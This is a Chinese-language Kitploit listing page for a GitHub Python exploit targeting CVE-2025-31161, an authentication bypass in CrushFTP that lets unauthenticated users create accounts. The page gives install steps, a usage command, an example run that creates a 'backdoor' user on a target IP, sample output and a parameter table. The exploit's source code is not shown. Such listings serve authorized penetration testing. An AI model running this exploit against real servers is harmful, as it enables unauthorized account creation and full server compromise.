Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-31161 — 🛡️ CVE-2025-31161 - CrushFTP 用户创建认证绕过漏洞利用程序 | Kitploit
工具/GitHubGitHub/0xgh057r3c0n/cve-2025-31161
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHub0xgh057r3c0n/cve-2025-31161

CVE-2025-31161

🛡️ CVE-2025-31161 - CrushFTP 用户创建认证绕过漏洞利用程序

查看仓库
531年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-31161 - CrushFTP 用户创建认证绕过利用工具

CrushFTP 标志

📌 描述

这个 Python 利用工具针对存在 CVE-2025-31161 漏洞的 CrushFTP 服务器。该漏洞允许通过向 WebInterface 发送特制的 XML 负载来创建未经过身份验证的用户账户,可能导致服务器完全沦陷。


⚠️ 免责声明

此工具仅用于教育和授权安全测试。
未经授权对你不拥有或未获明确许可的系统进行使用是非法且不道德的。


🧰 环境要求

  • Python 3
  • pip3
  • Python 模块:
    • requests
    • colorama

✅ 安装 Python3 和 pip3

Debian/Ubuntu:

root@kitploit:~
sudo apt update
sudo apt install python3 python3-pip -y

CentOS/RHEL:

root@kitploit:~
sudo yum install python3 python3-pip -y

macOS(使用 Homebrew):

root@kitploit:~
brew install python3

✅ 安装 Python 依赖

root@kitploit:~
pip3 install requests colorama

🔧 用法

root@kitploit:~
python3 CVE-2025-31161.py --target_host <TARGET_IP> [--port <PORT>] [--target_user <ADMIN>] [--new_user <USERNAME>] [--password <PASSWORD>]

🔍 示例

root@kitploit:~
python3 CVE-2025-31161.py --target_host 192.168.1.100 --new_user backdoor --password P@ssw0rd!

🧪 命令行选项


🖥️ 示例输出

root@kitploit:~
[+] Preparing Payloads
  [-] Warming up the target...
  [-] Target is up and running
[+] Sending Account Create Request
  [!] User created successfully!

[+] Exploit Complete! You can now login with:
   [*] Username: AuthBypassAccount
   [*] Password: CorrectHorseBatteryStaple

👨‍💻 作者

Gaurav Bhattacharjee (G4UR4V007)


📄 许可证

本项目采用 MIT 许可证 授权。

下载工具
参数描述默认值
--target_host(必需) 目标的 IP 或域名—
--portCrushFTP WebInterface 端口8080
--target_user管理员用户名(用于负载中)crushadmin
--new_user新建未授权账户的用户名AuthBypassAccount
--password新用户的密码CorrectHorseBatteryStaple